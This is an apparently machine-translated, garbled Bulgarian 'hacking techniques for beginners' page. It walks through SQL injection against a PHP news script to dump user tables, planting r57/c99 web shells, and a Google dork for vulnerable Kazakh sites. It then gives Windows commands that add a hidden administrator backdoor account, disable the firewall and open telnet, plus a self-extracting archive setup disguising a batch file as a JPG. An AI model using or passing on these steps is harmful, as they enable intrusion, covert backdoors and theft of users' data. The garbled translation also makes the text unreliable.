хакерски техники
[Сух за начинаещи]
$ Id = $ _REQUEST [ "ID"];
$ Res = mysql_query ( "SELECT * ОТ КОИТО новини id_news = $ номер");
Ако това не се филтрира по погрешка ще:
(Внимание: MySQL (): доставени аргумент не е валиден MySQL резултат на ресурсите в)
След това е изчисляването на полетата в таблицата с помощта на ORDER BY параметър
Да предположим, че полета 7, от които 3 са показани на сайта.
Изходна поле 3, 5. Научете MySQL версия на базата данни посредством версия ()
Сайтът на 3-то поле ще бъдат записани версия на базата данни. Да предположим, че е версия 5.
Във всички версии на над 4-ти има универсални INFORMATION_SCHEMA.TABLES маса и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME
Сега в третата областта на взривени всички таблици, които са в базата данни.
Всички колони са в таблицата.
Освен това, потребителите да намерят такава таблица и поле например user_name, user_pass, USER_EMAIL, user_mobile, user_address
Като достъп до обекта може да използвате admike уязвимост Tipo PHP - инжектиране
Това е да се запълни с черупки сървър (специална PHP скрипт, който дава пълен достъп до сървъра и хостинг по принцип, Toe е, ако сървърът не се намери един участък и 50 -. 100 след това тя може да се използва, за да получат достъп до редактиране на всички сайтове и управлението на операционната система на сървъра ) например r57shell или c99madshell.
Намерете подобни уязвимости на уебсайтове не е трудно да се влиза само в google.com
поискване: inurl :? news.php ИД = 5 сайт: KZ Внимание: MySQL
При поискване ще бъдат пуснати много уязвими места, разположени в Казахстан.
компютърни ентусиасти.
Има толкова много начини, но аз ще говоря за универсалното, може да се използва, за да получите пълен достъп до компютъра за свързване към работния плот.
CHCP 1251
Нетната потребителското coolz 12333 / добавяне
нетните localgroup Администраторите coolz / добавяне
нетните localgroup Администраторите coolz / добавяне
Нетната спирка SharedAccess
SC довереник tlntsvr започне = автоматично
tlntadmn конфигурационния порт = 972 сек = -NTLM
Нетната старт Telnet
Създаване на отделна система потребителското coolz и да зададете парола 12333
На следващо място, присвоите администраторски права. И отваря порт 972.
Извън това изберете файла, който искате да "Временно правителство" нека да бъде по-1.jpg картина
Path =% WinDir% температура
SavePath
Setup = cool.bat
Setup = 1.EXE
Silent = 1
Всички прикрито файл с командния файл е готов
Това означава, че след като отворен файл се изпълнява бухалка файл за отвореното изображение
След като се свържете с компютър, можете да се позволи достъп до дистанционно управление
За да направите това, със следните параметри се въвеждат от командния ред
CHCP 1251
Нетната localgroup отдалеченото работно Потребители coolz / добавят
Нетната сметки / maxpwage: неограничен
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" / об "coolz" / т REG_DWORD / г 0 / е
Нетната спирка SharedAccess
SC довереник SharedAccess започне = инвалиди
SC довереник tlntsvr започне = автоматично
За счупи кутия кажа накратко.
Има 3 начина да хакнат:
Първата груба сила парола речника
2-ра употреба XSS уязвимости
трети sots.inzheneriya
Свързани статии